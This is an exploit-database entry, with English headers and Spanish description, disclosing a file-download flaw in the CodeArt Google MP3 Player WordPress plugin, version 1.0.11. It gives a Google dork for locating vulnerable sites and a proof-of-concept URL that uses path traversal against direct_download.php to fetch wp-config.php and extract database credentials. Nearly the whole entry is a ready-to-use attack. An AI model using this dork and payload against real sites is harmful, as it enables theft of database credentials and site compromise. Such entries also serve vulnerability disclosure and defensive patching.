# Exploit Title: Wordpress CodeArt Google MP3 Player plugin - File
Disclosure Download
# Google Dork:
inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=
# Date: 02/12/2014
# Exploit Author: QK14 Team
# Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/
# Software Link: https://wordpress.org/plugins/google-mp3-audio-player/
# Version: 1.0.11
# http://wordpressa.quantika14.com/repository/index.php?id=14
Descripci�n:
Este plugin es vulnerable a File Disclosure Download.
Gracias a esta vulnerabilidad, un usuario podr� descargar el archivo de
configuraci�n config.php y extraer de �l los datos de acceso a la Base de
Datos.
POF:
localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo
ad.php?file=../../../wp-config.php
